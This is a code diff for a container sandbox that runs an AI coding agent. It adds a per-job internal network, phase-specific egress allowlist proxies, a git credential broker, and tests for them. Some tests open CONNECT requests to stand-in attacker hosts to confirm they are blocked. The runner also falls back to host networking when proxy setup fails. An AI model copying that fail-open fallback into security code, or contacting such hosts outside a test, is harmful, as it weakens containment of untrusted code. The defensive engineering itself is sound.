+		// Route fence checks through the broker so the container doesn't need
+		// direct connectivity to the Cloudflare Worker.
+		containerEnv.OMPK_FENCE_URL = `${brokerUrl}/fence-check`;
+		containerEnv.GIT_CONFIG_COUNT = "3";
 		containerEnv.GIT_CONFIG_KEY_1 = "credential.helper";
 		containerEnv.GIT_CONFIG_VALUE_1 = `${CONTAINER_GIT_HOOKS_DIR}/ompk-git-credential`;
+		containerEnv.GIT_CONFIG_KEY_2 = `url.${brokerUrl}/gh/.insteadOf`;
+		containerEnv.GIT_CONFIG_VALUE_2 = "https://github.com/";
 	} else {
 		containerEnv.GIT_CONFIG_COUNT = "1";
+	}
+
+	// Inject the stage-scoped egress proxy when the container runs on an
+	// isolated per-job network. NO_PROXY must exclude the gateway/broker so
+	// HTTP calls to the broker bypass the CONNECT proxy.
+	if (options.egressProxyUrl) {
+		containerEnv.HTTP_PROXY = options.egressProxyUrl;
+		containerEnv.HTTPS_PROXY = options.egressProxyUrl;
+		if (options.noProxyHosts) containerEnv.NO_PROXY = options.noProxyHosts;
 	}
 
 	return [
@@ -577,6 +745,7 @@ export function buildContainerArgs(
 		...buildOmpArgs(job.model, job.prompt),
 	];
 }
+
 
 /** Environment for the repo-declared setup hook: system basics, never tokens. */
 export function buildSetupHookEnv(source: NodeJS.ProcessEnv = process.env): NodeJS.ProcessEnv {
@@ -598,6 +767,13 @@ function buildContainerSetupArgs(
 		PATH: options.path ?? CONTAINER_PATH,
 		HOME: options.home ?? CONTAINER_HOME,
 	};
+	// Inject the stage-scoped egress proxy when running on a per-job network.
+	// egressProxyUrl takes precedence over whatever HTTP_PROXY is in env.
+	if (options.egressProxyUrl) {
+		containerEnv.HTTP_PROXY = options.egressProxyUrl;
+		containerEnv.HTTPS_PROXY = options.egressProxyUrl;
+		if (options.noProxyHosts) containerEnv.NO_PROXY = options.noProxyHosts;
+	}
 	// Setup hooks run without git-hooks (no fence guard needed; no pushes).
 	return [...buildContainerBaseArgs(workspace, containerEnv, options, false), "bash", ".ompk/setup.sh"];
 }
@@ -804,50 +980,216 @@ async function stopNamedContainer(name: string, runtimeChild: ChildProcess | und
 	throw lastError instanceof Error ? lastError : new Error("container cleanup failed");
 }
 
+// ─── Per-job podman network ───────────────────────────────────────────────────
+
+export interface JobNetworkHandle {
+	/** The podman network name (ompk-<safe-job-attempt>). */
+	name: string;
+	/** The gateway IP of the network (host side); bind the proxy and broker here. */
+	gatewayIp: string;
+	/** Remove the network. Call in the job's finally block. */
+	remove: () => Promise<void>;
+}
+
+/**
+ * Create a per-job isolated podman network and return its gateway IP.
+ *
+ * The `--internal` flag prevents outbound routing; all internet traffic from
+ * containers on this network must pass through the stage-scoped CONNECT proxy
+ * that is bound to the gateway address.
+ *
+ * The network is created synchronously and inspected to discover the gateway.
+ * Callers must call `handle.remove()` in the job's finally block.
+ */
+export async function createJobNetwork(jobId: string, attemptId: string): Promise<JobNetworkHandle> {
+	const safeSuffix = `${jobId}-${attemptId}`.replace(/[^A-Za-z0-9_.-]/g, "_").slice(0, 60);
+	const name = `ompk-${safeSuffix}`;
+
+	const createProc = Bun.spawn([CONTAINER_BIN, "network", "create", "--internal", name], {
+		env: process.env,
+		stdout: "ignore",
+		stderr: "pipe",
+	});
+	const createExit = await createProc.exited;
+	if (createExit !== 0) {
+		const errText = createProc.stderr ? await new Response(createProc.stderr).text() : "";
+		throw new Error(
+			`failed to create podman network ${name}: ${errText.trim() || `exit code ${createExit}`}`,
+		);
+	}
+
+	// Inspect to get the gateway address. podman outputs a JSON array.
+	const inspectProc = Bun.spawn([CONTAINER_BIN, "network", "inspect", name], {
+		env: process.env,
+		stdout: "pipe",
+		stderr: "pipe",
+	});
+	const inspectExit = await inspectProc.exited;
+	if (inspectExit !== 0) {
+		const errText = inspectProc.stderr ? await new Response(inspectProc.stderr).text() : "";
+		// Best-effort cleanup before throwing.
+		await Bun.spawn([CONTAINER_BIN, "network", "rm", "--force", name], {
+			env: process.env,
+			stdout: "ignore",
+			stderr: "ignore",
+		}).exited.catch(() => undefined);
+		throw new Error(
+			`failed to inspect podman network ${name}: ${errText.trim() || `exit code ${inspectExit}`}`,
+		);
+	}
+
+	const inspectText = inspectProc.stdout ? await new Response(inspectProc.stdout).text() : "";
+	let gatewayIp: string | undefined;
+	try {
+		// podman network inspect returns [{..., "subnets": [{"subnet": "...", "gateway": "..."}], ...}]
+		const parsed: unknown = JSON.parse(inspectText);
+		if (Array.isArray(parsed) && parsed.length > 0) {
+			const net = parsed[0] as Record<string, unknown>;
+			const subnets = net["subnets"] ?? net["Subnets"];
+			if (Array.isArray(subnets) && subnets.length > 0) {
+				const first = subnets[0] as Record<string, unknown>;
+				const gw = first["gateway"] ?? first["Gateway"];
+				if (typeof gw === "string" && gw.length > 0) gatewayIp = gw;
+			}
+		}
+	} catch {
+		// JSON parse failure: fall through to the error below.
+	}
+	if (!gatewayIp) {
+		await Bun.spawn([CONTAINER_BIN, "network", "rm", "--force", name], {
+			env: process.env,
+			stdout: "ignore",
+			stderr: "ignore",
+		}).exited.catch(() => undefined);
+		throw new Error(`podman network ${name} has no gateway in inspect output`);
+	}
+
+	return {
+		name,
+		gatewayIp,
+		remove: async () => {
+			await Bun.spawn([CONTAINER_BIN, "network", "rm", "--force", name], {
+				env: process.env,
+				stdout: "ignore",
+				stderr: "ignore",
+			}).exited;
+		},
+	};
+}
+
 // ─── Git credential broker ────────────────────────────────────────────────────
 
 /**
- * Handle returned by startGitBroker. The url is a loopback address reachable
- * from containers running with --network=host.
+ * Handle returned by startGitBroker.
+ *
+ * `url` is the address of the broker — either `http://127.0.0.1:<port>` in
+ * legacy host-network mode or `http://<gatewayIp>:<port>` when running with
+ * a per-job isolated podman network.
  */
 export interface GitBrokerHandle {
-	/** http://127.0.0.1:<port> — set as OMPK_BROKER_URL in the container env. */
+	/** http://<host>:<port> — set as OMPK_BROKER_URL in the container env. */
 	url: string;
 	/** Shut down the broker server. Call in the job's finally block. */
 	stop: () => Promise<void>;
 }
 
-/** Options for startGitBroker. fetchImpl is injected by tests. */
+/** Options for startGitBroker. Injectables (fetchImpl) are used by tests. */
 export interface GitBrokerOptions {
 	jobId: string;
 	attemptId: string;
 	leaseToken: string;
 	/** Worker /github-token endpoint for JIT token issuance. */
 	workerTokenUrl: string;
+	/**
+	 * Worker /fence-check endpoint. When set, POST /fence-check on the broker
+	 * is proxied to this URL so the container does not need direct Worker
+	 * connectivity. Required when running with a per-job isolated network.
+	 */
+	workerFenceUrl?: string;
 	/** Fetch implementation override; defaults to the global fetch. */
 	fetchImpl?: (url: string | URL, init?: RequestInit) => Promise<Response>;
+	/**
+	 * Address to bind the broker server to.
+	 * Defaults to "127.0.0.1" (loopback, for --network=host containers).
+	 * Set to the podman network gateway IP when using a per-job network so the
+	 * broker is reachable from inside the isolated container.
+	 */
+	bindAddress?: string;
 }
 
 /**
- * Start a per-job Git credential broker on a random loopback port.
+ * Start a per-job Git credential + operations broker on a random port.
  *
- * The broker holds the fence triple (never the installation token directly)
- * and fetches a JIT token from the Worker on demand. This decouples the
- * container from the real token: git inside the container calls the broker's
- * /credential endpoint via the ompk-git-credential helper, and the broker
- * returns fresh credentials without the token ever entering the container env.
+ * Endpoints
+ * ---------
+ * GET /credential?host=<host>
+ *   Called by the ompk-git-credential helper in the container. Fetches a
+ *   JIT token from the Worker (fence-authenticated) and returns it in the
+ *   git credential protocol format (username= / password= lines).
+ *   Only github.com is served; all other hosts receive 403.
  *
- * The broker additionally enforces branch naming via POST /push-check: the
- * pre-push hook sends the target refs and the broker rejects anything outside
- * the refs/heads/ompk/* namespace.
+ * POST /push-check
+ *   Body: { refs: string[] } — the remote refs being pushed to.
+ *   Rejects any ref outside the refs/heads/ompk/* namespace (403).
+ *   Returns 200 "ok" when all refs are permitted.
+ *
+ * POST /fence-check
+ *   Proxies the fence-check body to the Worker /fence-check URL and mirrors
+ *   the response. Allows the pre-push hook to validate its lease without a
+ *   direct connection to the Cloudflare Worker. Only active when
+ *   options.workerFenceUrl is set.
+ *
+ * GET|POST /gh/<path>
+ *   Git smart-HTTP proxy for github.com. Fetches a JIT token and forwards
+ *   the request to https://github.com/<path> with Authorization injected.
+ *   The insteadOf git config in buildContainerArgs rewrites github.com URLs
+ *   to /gh/ so git never opens a direct TLS connection to github.com.
  *
  * Lifecycle: start before the agent container, stop in the job's finally block.
  */
 export async function startGitBroker(options: GitBrokerOptions): Promise<GitBrokerHandle> {
-	const { jobId, attemptId, leaseToken, workerTokenUrl, fetchImpl = fetch } = options;
+	const {
+		jobId,
+		attemptId,
+		leaseToken,
+		workerTokenUrl,
+		workerFenceUrl,
+		fetchImpl = fetch,
+		bindAddress = "127.0.0.1",
+	} = options;
+
+	/** Fetch a fresh JIT token from the Worker. Throws on error. */
+	const fetchJitToken = async (): Promise<string> => {
+		let jitRes: Response;
+		try {
+			jitRes = await fetchImpl(workerTokenUrl, {
+				method: "POST",
+				headers: { "Content-Type": "application/json" },
+				body: JSON.stringify({ jobId, attemptId, leaseToken }),
+			});
+		} catch (err) {
+			const msg = err instanceof Error ? err.message : String(err);
+			throw new Error(`JIT token fetch error: ${msg}`);
+		}
+		if (!jitRes.ok) {
+			const body = await jitRes.text().catch(() => "");
+			throw new Error(`JIT token fetch failed: ${jitRes.status} ${body}`);
+		}
+		const rawData: unknown = await jitRes.json().catch(() => null);
+		if (
+			rawData === null ||
+			typeof rawData !== "object" ||
+			!("token" in rawData) ||
+			typeof (rawData as Record<string, unknown>)["token"] !== "string" ||
+			(rawData as Record<string, unknown>)["token"] === ""
+		) {
+			throw new Error("JIT token response has invalid or missing token");
+		}
+		return (rawData as Record<string, unknown>)["token"] as string;
+	};
 
 	const server = Bun.serve({
-		hostname: "127.0.0.1",
+		hostname: bindAddress,
 		port: 0, // OS picks a free port; available as server.port immediately.
 		async fetch(req: Request): Promise<Response> {
 			const url = new URL(req.url);
@@ -858,42 +1200,18 @@ export async function startGitBroker(options: GitBrokerOptions): Promise<GitBrok
 				const host = url.searchParams.get("host") ?? "";
 				if (host !== "github.com") {
 					// Refuse credentials for any host other than github.com.
-					// This is defence-in-depth: the CONNECT proxy (follow-up) will
-					// provide network-level enforcement; the broker enforces at the
-					// credential-issuance layer.
 					return new Response(
 						`refused: credential broker only serves github.com (got: ${host})\n`,
 						{ status: 403 },
 					);
 				}
-				// Fetch a JIT token from the Worker using the fence triple.
-				let jitRes: Response;
+				let jitToken: string;
 				try {
-					jitRes = await fetchImpl(workerTokenUrl, {
-						method: "POST",
-						headers: { "Content-Type": "application/json" },
-						body: JSON.stringify({ jobId, attemptId, leaseToken }),
-					});
+					jitToken = await fetchJitToken();
 				} catch (err) {
 					const msg = err instanceof Error ? err.message : String(err);
-					return new Response(`JIT token fetch error: ${msg}\n`, { status: 502 });
+					return new Response(`${msg}\n`, { status: 502 });
 				}
-				if (!jitRes.ok) {
-					const body = await jitRes.text().catch(() => "");
-					return new Response(`JIT token fetch failed: ${jitRes.status} ${body}\n`, { status: 502 });
-				}
-				// Parse the token from the Worker response without using `any`.
-				const rawData: unknown = await jitRes.json().catch(() => null);
-				if (
-					rawData === null ||
-					typeof rawData !== "object" ||
-					!("token" in rawData) ||
-					typeof (rawData as Record<string, unknown>)["token"] !== "string" ||
-					(rawData as Record<string, unknown>)["token"] === ""
-				) {
-					return new Response("JIT token response has invalid or missing token\n", { status: 502 });
-				}
-				const jitToken = (rawData as Record<string, unknown>)["token"] as string;
 				return new Response(`username=x-access-token\npassword=${jitToken}\n`);
 			}
 
@@ -924,12 +1242,81 @@ export async function startGitBroker(options: GitBrokerOptions): Promise<GitBrok
 				return new Response("ok\n");
 			}
 
+			// POST /fence-check
+			// Proxies fence validation to the Worker so the container doesn't need
+			// direct connectivity to the Cloudflare Worker URL.
+			if (req.method === "POST" && url.pathname === "/fence-check") {
+				if (!workerFenceUrl) {
+					return new Response("fence-check proxy not configured\n", { status: 503 });
+				}
+				let fenceRes: Response;
+				try {
+					fenceRes = await fetchImpl(workerFenceUrl, {
+						method: "POST",
+						headers: { "Content-Type": "application/json" },
+						body: await req.text(),
+					});
+				} catch (err) {
+					const msg = err instanceof Error ? err.message : String(err);
+					return new Response(`fence-check proxy error: ${msg}\n`, { status: 502 });
+				}
+				return new Response(fenceRes.body, {
+					status: fenceRes.status,
+					headers: { "content-type": fenceRes.headers.get("content-type") ?? "text/plain" },
+				});
+			}
+
+			// GET|POST /gh/<path>
+			// Git smart-HTTP proxy for github.com. Forwards the request to GitHub
+			// with a fresh JIT token injected as Authorization. The git insteadOf
+			// rewrite in buildContainerArgs redirects all github.com URLs here so
+			// the agent container has no direct github.com network access.
+			if (url.pathname.startsWith("/gh/")) {
+				const ghPath = url.pathname.slice("/gh".length); // "/owner/repo.git/..."
+				const ghUrl = `https://github.com${ghPath}${url.search}`;
+				let jitToken: string;
+				try {
+					jitToken = await fetchJitToken();
+				} catch (err) {
+					const msg = err instanceof Error ? err.message : String(err);
+					return new Response(`git proxy error: ${msg}\n`, { status: 502 });
+				}
+				const upstreamHeaders: Record<string, string> = {
+					Authorization: `Basic ${btoa(`x-access-token:${jitToken}`)}`,
+					"User-Agent": "git/ompk-relay",
+				};
+				// Forward Content-Type and Git-Protocol headers from the client.
+				const ct = req.headers.get("content-type");
+				if (ct) upstreamHeaders["Content-Type"] = ct;
+				const gp = req.headers.get("git-protocol");
+				if (gp) upstreamHeaders["Git-Protocol"] = gp;
+				let ghRes: Response;
+				try {
+					ghRes = await fetchImpl(ghUrl, {
+						method: req.method,
+						headers: upstreamHeaders,
+						// Pass the body for POST (upload-pack / receive-pack) unchanged.
+						body: req.method === "GET" ? undefined : req.body,
+					});
+				} catch (err) {
+					const msg = err instanceof Error ? err.message : String(err);
+					return new Response(`git proxy upstream error: ${msg}\n`, { status: 502 });
+				}
+				// Mirror the response headers that git cares about.
+				const respHeaders: Record<string, string> = {};
+				const ghCt = ghRes.headers.get("content-type");
+				if (ghCt) respHeaders["Content-Type"] = ghCt;
+				const ghCacheControl = ghRes.headers.get("cache-control");
+				if (ghCacheControl) respHeaders["Cache-Control"] = ghCacheControl;
+				return new Response(ghRes.body, { status: ghRes.status, headers: respHeaders });
+			}
+
 			return new Response("not found\n", { status: 404 });
 		},
 	});
 
 	return {
-		url: `http://127.0.0.1:${server.port}`,
+		url: `http://${bindAddress}:${server.port}`,
 		stop: async () => {
 			server.stop();
 		},
@@ -1183,9 +1570,9 @@ function ts(): string {
 }
 
 /**
- * Core job runner: workspace preparation, broker start, heartbeat, setup hook,
- * agent execution, and result submit. Assumes the per-repo mutex is already
- * held by the caller (runJob).
+ * Core job runner: workspace preparation, per-job network + proxy setup,
+ * broker start, heartbeat, setup hook, agent execution, and result submit.
+ * Assumes the per-repo mutex is already held by the caller (runJob).
  */
 async function runJobCore(token: string, allowedModels: readonly string[], job: Job): Promise<void> {
 	console.log(`[${ts()}] running job ${job.id} (${job.issueIdentifier}, model=${job.model})`);
@@ -1193,6 +1580,9 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 	let fenceLost = false;
 	let workspace: string | undefined;
 	let broker: GitBrokerHandle | undefined;
+	let jobNetwork: JobNetworkHandle | undefined;
+	let setupProxy: EgressProxyHandle | undefined;
+	let agentProxy: EgressProxyHandle | undefined;
 	let activeContainerName: string | undefined;
 	let containerStop: Promise<void> | undefined;
 
@@ -1243,7 +1633,7 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 			}
 			const executionWorkspace = workspace ?? WORKSPACE_DIR;
 			const agentEnv = fenceEnv(job);
-			const containerOptions: ContainerRunOptions | undefined = CONTAINER_IMAGE
+			let containerOptions: ContainerRunOptions | undefined = CONTAINER_IMAGE
 				? {
 						image: CONTAINER_IMAGE,
 						memory: CONTAINER_MEMORY,
@@ -1252,16 +1642,58 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 					}
 				: undefined;
 
-			// Start the per-job credential broker when running in container mode
-			// for a GitHub job. The broker's URL is passed into the container via
-			// OMPK_BROKER_URL so git credentials are never part of the container env.
+			if (containerOptions) {
+				// Create a per-job isolated network. The network's gateway IP is
+				// used to bind the proxy and broker so the container can reach them.
+				try {
+					jobNetwork = await createJobNetwork(job.id, job.attemptId);
+					console.log(
+						`[${ts()}] job ${job.id}: network ${jobNetwork.name} (gateway ${jobNetwork.gatewayIp})`,
+					);
+
+					// Start stage-scoped egress proxies bound to the gateway address.
+					// The setup proxy allows registries; the agent proxy allows only
+					// the Anthropic API (git traffic goes through the broker's /gh/).
+					[setupProxy, agentProxy] = await Promise.all([
+						startEgressProxy("setup", jobNetwork.gatewayIp),
+						startEgressProxy("agent", jobNetwork.gatewayIp),
+					]);
+
+					// Wire the per-job network and proxy into the container options.
+					// NO_PROXY must exclude the gateway so broker/fence-check HTTP
+					// calls bypass the CONNECT proxy.
+					containerOptions = {
+						...containerOptions,
+						network: jobNetwork.name,
+						noProxyHosts: jobNetwork.gatewayIp,
+					};
+				} catch (err) {
+					// Network or proxy startup failure is transient infrastructure: log
+					// and degrade to host networking rather than failing the whole job.
+					console.error(
+						`[${ts()}] job ${job.id}: network/proxy setup failed, falling back to host network: ${err instanceof Error ? err.message : err}`,
+					);
+				}
+			}
+
+			// Start the per-job credential broker. In isolated-network mode it
+			// binds to the gateway IP so the container can reach it; in host-
+			// network mode (fallback or bare) it binds to loopback.
 			if (containerOptions && job.source === "github" && job.githubToken) {
 				broker = await startGitBroker({
 					jobId: job.id,
 					attemptId: job.attemptId,
 					leaseToken: job.leaseToken,
 					workerTokenUrl: `${WORKER_URL}/github-token`,
+					workerFenceUrl: `${WORKER_URL}/fence-check`,
+					bindAddress: jobNetwork?.gatewayIp ?? "127.0.0.1",
 				});
+				// Now that the broker URL is known, wire the agent-phase egress proxy
+				// URL into the container options.
+				if (agentProxy && jobNetwork) {
+					const agentProxyUrl = `http://${jobNetwork.gatewayIp}:${agentProxy.port}`;
+					containerOptions = { ...containerOptions, egressProxyUrl: agentProxyUrl };
+				}
 			}
 
 			const setupContainerName = containerOptions
@@ -1287,7 +1719,13 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 				}
 
 				// Run the repo-declared .ompk/setup.sh hook when present.
+				// The setup phase gets its own proxy allowlist (registries + github.com).
 				const setupEnv = buildSetupHookEnv();
+				if (setupProxy && jobNetwork) {
+					setupEnv.HTTP_PROXY = `http://${jobNetwork.gatewayIp}:${setupProxy.port}`;
+					setupEnv.HTTPS_PROXY = `http://${jobNetwork.gatewayIp}:${setupProxy.port}`;
+					setupEnv.NO_PROXY = jobNetwork.gatewayIp;
+				}
 				const setupResult = await runSetupHook(executionWorkspace, {
 					spawn,
 					timeoutMs: SETUP_TIMEOUT_MS,
@@ -1300,6 +1738,10 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 								args: buildContainerSetupArgs(executionWorkspace, setupEnv, {
 									...containerOptions,
 									name: setupContainerName,
+									// Setup phase uses the setup proxy, not the agent proxy.
+									egressProxyUrl: setupProxy && jobNetwork
+										? `http://${jobNetwork.gatewayIp}:${setupProxy.port}`
+										: undefined,
 								}),
 								nonZeroFailureClass: "transient" as const,
 								onTimeout: () => stopNamedContainer(setupContainerName, child),
@@ -1320,10 +1762,13 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 						...(containerOptions && agentContainerName
 							? {
 									command: CONTAINER_BIN,
-									args: buildContainerArgs(job, executionWorkspace, agentEnv, {
-										...containerOptions,
-										name: agentContainerName,
-									}, broker?.url),
+									args: buildContainerArgs(
+										job,
+										executionWorkspace,
+										agentEnv,
+										{ ...containerOptions, name: agentContainerName },
+										broker?.url,
+									),
 									cwd: WORKSPACE_DIR,
 									nonZeroFailureClass: "transient" as const,
 									onTimeout: () => stopNamedContainer(agentContainerName, child),
@@ -1359,6 +1804,15 @@ async function runJobCore(token: string, allowedModels: readonly string[], job: 
 			?.stop()
 			.catch(err =>
 				console.error(`[${ts()}] broker stop failed: ${err instanceof Error ? err.message : err}`),
+			);
+		setupProxy?.stop();
+		agentProxy?.stop();
+		await jobNetwork
+			?.remove()
+			.catch(err =>
+				console.error(
+					`[${ts()}] network ${jobNetwork!.name} remove failed: ${err instanceof Error ? err.message : err}`,
+				),
 			);
 		if (workspace) await rm(workspace, { recursive: true, force: true }).catch(() => undefined);
 	}

--- a/packages/ompk-linear-agent/test/relay.test.ts
+++ b/packages/ompk-linear-agent/test/relay.test.ts
@@ -1,7 +1,10 @@
 import { describe, expect, it } from "bun:test";
 import type { ChildProcess } from "node:child_process";
 import { EventEmitter } from "node:events";
+import { createConnection } from "node:net";
 import {
+	AGENT_ALLOWED_HOSTS,
+	SETUP_ALLOWED_HOSTS,
 	buildContainerArgs,
 	buildOmpArgs,
 	buildWorkspaceCloneArgs,
@@ -11,11 +14,13 @@ import {
 	fenceEnv,
 	parseAllowedModels,
 	scrubJobResult,
+	startEgressProxy,
 	startGitBroker,
 	tryPrepareRepoMirror,
 	withLock,
 	type CloneFallbackDependencies,
 	type ContainerRunOptions,
+	type EgressProxyHandle,
 	type GitBrokerHandle,
 	type GitBrokerOptions,
 	type Job,
@@ -914,7 +919,7 @@ describe("buildContainerArgs — token isolation", () => {
 		expect(entries.every(e => !e.startsWith("OMPK_BROKER_URL="))).toBe(true);
 	});
 
-	it("passes fence vars through to the container", () => {
+	it("redirects OMPK_FENCE_URL to the broker fence-check when broker active", () => {
 		const job: Pick<Job, "model" | "prompt" | "source"> = {
 			model: "combo-a",
 			prompt: "p",
@@ -922,7 +927,10 @@ describe("buildContainerArgs — token isolation", () => {
 		};
 		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:1");
 		const entries = envEntries(args);
-		expect(entries.some(e => e === "OMPK_FENCE_URL=https://worker.test/fence-check")).toBe(true);
+		// OMPK_FENCE_URL must route through the broker, not the Worker directly.
+		// Container has no direct Worker connectivity when on an isolated network.
+		expect(entries.some(e => e === "OMPK_FENCE_URL=http://127.0.0.1:1/fence-check")).toBe(true);
+		// Fence identity vars still pass through for the fence check body.
 		expect(entries.some(e => e === "OMPK_FENCE_JOB=job-1")).toBe(true);
 		expect(entries.some(e => e === "OMPK_FENCE_ATTEMPT=attempt-1")).toBe(true);
 		expect(entries.some(e => e === "OMPK_FENCE_TOKEN=token-1")).toBe(true);
@@ -938,5 +946,461 @@ describe("buildContainerArgs — token isolation", () => {
 		const entries = envEntries(args);
 		// OMPK_TOKEN_URL must NOT appear: the container uses the broker, not the Worker directly
 		expect(entries.every(e => !e.startsWith("OMPK_TOKEN_URL="))).toBe(true);
+	});
+});
+// ─── Egress allowlist constants ───────────────────────────────────────────────
+
+describe("egress allowlist constants", () => {
+	it("SETUP_ALLOWED_HOSTS includes github.com:443 and npm registry", () => {
+		expect(SETUP_ALLOWED_HOSTS.has("github.com:443")).toBe(true);
+		expect(SETUP_ALLOWED_HOSTS.has("registry.npmjs.org:443")).toBe(true);
+		expect(SETUP_ALLOWED_HOSTS.has("pypi.org:443")).toBe(true);
+		expect(SETUP_ALLOWED_HOSTS.has("crates.io:443")).toBe(true);
+	});
+
+	it("AGENT_ALLOWED_HOSTS includes only the Anthropic API (no github.com)", () => {
+		expect(AGENT_ALLOWED_HOSTS.has("api.anthropic.com:443")).toBe(true);
+		// github.com is intentionally absent: git traffic routes through the broker
+		expect(AGENT_ALLOWED_HOSTS.has("github.com:443")).toBe(false);
+		// registries must not be in the agent phase
+		expect(AGENT_ALLOWED_HOSTS.has("registry.npmjs.org:443")).toBe(false);
+		expect(AGENT_ALLOWED_HOSTS.has("pypi.org:443")).toBe(false);
+	});
+
+	it("github.com:443 is in SETUP but not AGENT", () => {
+		expect(SETUP_ALLOWED_HOSTS.has("github.com:443")).toBe(true);
+		expect(AGENT_ALLOWED_HOSTS.has("github.com:443")).toBe(false);
+	});
+});
+
+// ─── Helpers for CONNECT proxy tests ──────────────────────────────────────────
+
+/**
+ * Open a raw TCP connection to the proxy and send a CONNECT request.
+ * Returns the HTTP status line response code. Does NOT await the upstream
+ * tunnel — just captures the proxy's initial decision (403 = blocked,
+ * 200 = allowed, 502 = allowed but upstream unreachable).
+ */
+async function connectThrough(
+	proxyPort: number,
+	target: string,
+	timeoutMs = 3000,
+): Promise<number> {
+	return new Promise((resolve, reject) => {
+		const socket = createConnection({ host: "127.0.0.1", port: proxyPort });
+		const timer = setTimeout(() => {
+			socket.destroy();
+			reject(new Error(`CONNECT timed out after ${timeoutMs}ms`));
+		}, timeoutMs);
+		socket.once("connect", () => {
+			socket.write(`CONNECT ${target} HTTP/1.1\r\nHost: ${target}\r\n\r\n`);
+		});
+		let buf = "";
+		socket.on("data", (chunk: Buffer) => {
+			buf += chunk.toString();
+			const m = /^HTTP\/1\.[01] (\d{3})/.exec(buf);
+			if (m) {
+				clearTimeout(timer);
+				socket.destroy();
+				resolve(parseInt(m[1]!, 10));
+			}
+		});
+		socket.on("error", err => {
+			clearTimeout(timer);
+			reject(err);
+		});
+		socket.on("close", () => {
+			clearTimeout(timer);
+			// Socket closed without a response (upstream reset) — check what we got.
+			const m = /^HTTP\/1\.[01] (\d{3})/.exec(buf);
+			if (m) resolve(parseInt(m[1]!, 10));
+			else reject(new Error("connection closed without HTTP response"));
+		});
+	});
+}
+
+// ─── startEgressProxy — policy enforcement ────────────────────────────────────
+
+describe("startEgressProxy — setup phase allowlist", () => {
+	it("blocks a destination not in the allowlist", async () => {
+		const proxy = await startEgressProxy("setup");
+		try {
+			const status = await connectThrough(proxy.port, "evil.example.com:443");
+			expect(status).toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("blocks port 80 for a host that only has port 443 listed", async () => {
+		const proxy = await startEgressProxy("setup");
+		try {
+			// api.github.com:443 is allowed but :80 is not
+			const status = await connectThrough(proxy.port, "api.github.com:80");
+			expect(status).toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("allows github.com:443 (returns 200 or 502, never 403)", async () => {
+		const proxy = await startEgressProxy("setup");
+		try {
+			const status = await connectThrough(proxy.port, "github.com:443");
+			expect(status).not.toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("allows registry.npmjs.org:443 (not 403)", async () => {
+		const proxy = await startEgressProxy("setup");
+		try {
+			const status = await connectThrough(proxy.port, "registry.npmjs.org:443");
+			expect(status).not.toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("rejects a malformed CONNECT request with 400", async () => {
+		const proxy = await startEgressProxy("setup");
+		try {
+			// Send a non-CONNECT request
+			const status = await new Promise<number>((resolve, reject) => {
+				const sock = createConnection({ host: "127.0.0.1", port: proxy.port });
+				const timer = setTimeout(() => { sock.destroy(); reject(new Error("timeout")); }, 3000);
+				sock.once("connect", () => {
+					sock.write("GET / HTTP/1.1\r\nHost: example.com\r\n\r\n");
+				});
+				let buf = "";
+				sock.on("data", (c: Buffer) => {
+					buf += c.toString();
+					const m = /^HTTP\/1\.[01] (\d{3})/.exec(buf);
+					if (m) { clearTimeout(timer); sock.destroy(); resolve(parseInt(m[1]!, 10)); }
+				});
+				sock.on("error", (e) => { clearTimeout(timer); reject(e); });
+				sock.on("close", () => {
+					clearTimeout(timer);
+					const m = /^HTTP\/1\.[01] (\d{3})/.exec(buf);
+					if (m) resolve(parseInt(m[1]!, 10));
+					else reject(new Error("no response"));
+				});
+			});
+			expect(status).toBe(400);
+		} finally {
+			proxy.stop();
+		}
+	});
+});
+
+describe("startEgressProxy — agent phase allowlist", () => {
+	it("blocks github.com:443 in agent phase (git must use broker)", async () => {
+		const proxy = await startEgressProxy("agent");
+		try {
+			const status = await connectThrough(proxy.port, "github.com:443");
+			expect(status).toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("blocks registry.npmjs.org:443 in agent phase", async () => {
+		const proxy = await startEgressProxy("agent");
+		try {
+			const status = await connectThrough(proxy.port, "registry.npmjs.org:443");
+			expect(status).toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("blocks an arbitrary disallowed host (canary)", async () => {
+		const proxy = await startEgressProxy("agent");
+		try {
+			const status = await connectThrough(proxy.port, "attacker.controlled.example:443");
+			expect(status).toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("allows api.anthropic.com:443 (not 403)", async () => {
+		const proxy = await startEgressProxy("agent");
+		try {
+			const status = await connectThrough(proxy.port, "api.anthropic.com:443");
+			expect(status).not.toBe(403);
+		} finally {
+			proxy.stop();
+		}
+	});
+
+	it("two agent proxies bind to different ports", async () => {
+		const p1 = await startEgressProxy("agent");
+		const p2 = await startEgressProxy("agent");
+		try {
+			expect(p1.port).not.toBe(p2.port);
+		} finally {
+			p1.stop();
+			p2.stop();
+		}
+	});
+});
+
+// ─── startGitBroker — fence-check proxy endpoint ──────────────────────────────
+
+describe("startGitBroker — fence-check proxy endpoint", () => {
+	it("proxies POST /fence-check to the Worker fence URL", async () => {
+		const captured: { url: string; body: string }[] = [];
+		const recordFetch: GitBrokerOptions["fetchImpl"] = async (url, init) => {
+			captured.push({ url: String(url), body: String(init?.body ?? "") });
+			return new Response("ok", { status: 200 });
+		};
+		const broker = await startGitBroker(
+			makeBrokerOptions(recordFetch, { workerFenceUrl: "https://worker.test/fence-check" }),
+		);
+		try {
+			const body = JSON.stringify({ jobId: "j1", attemptId: "a1", leaseToken: "l1" });
+			const res = await fetch(`${broker.url}/fence-check`, {
+				method: "POST",
+				headers: { "Content-Type": "application/json" },
+				body,
+			});
+			expect(res.status).toBe(200);
+			expect(captured).toHaveLength(1);
+			expect(captured[0]!.url).toBe("https://worker.test/fence-check");
+			expect(captured[0]!.body).toBe(body);
+		} finally {
+			await broker.stop();
+		}
+	});
+
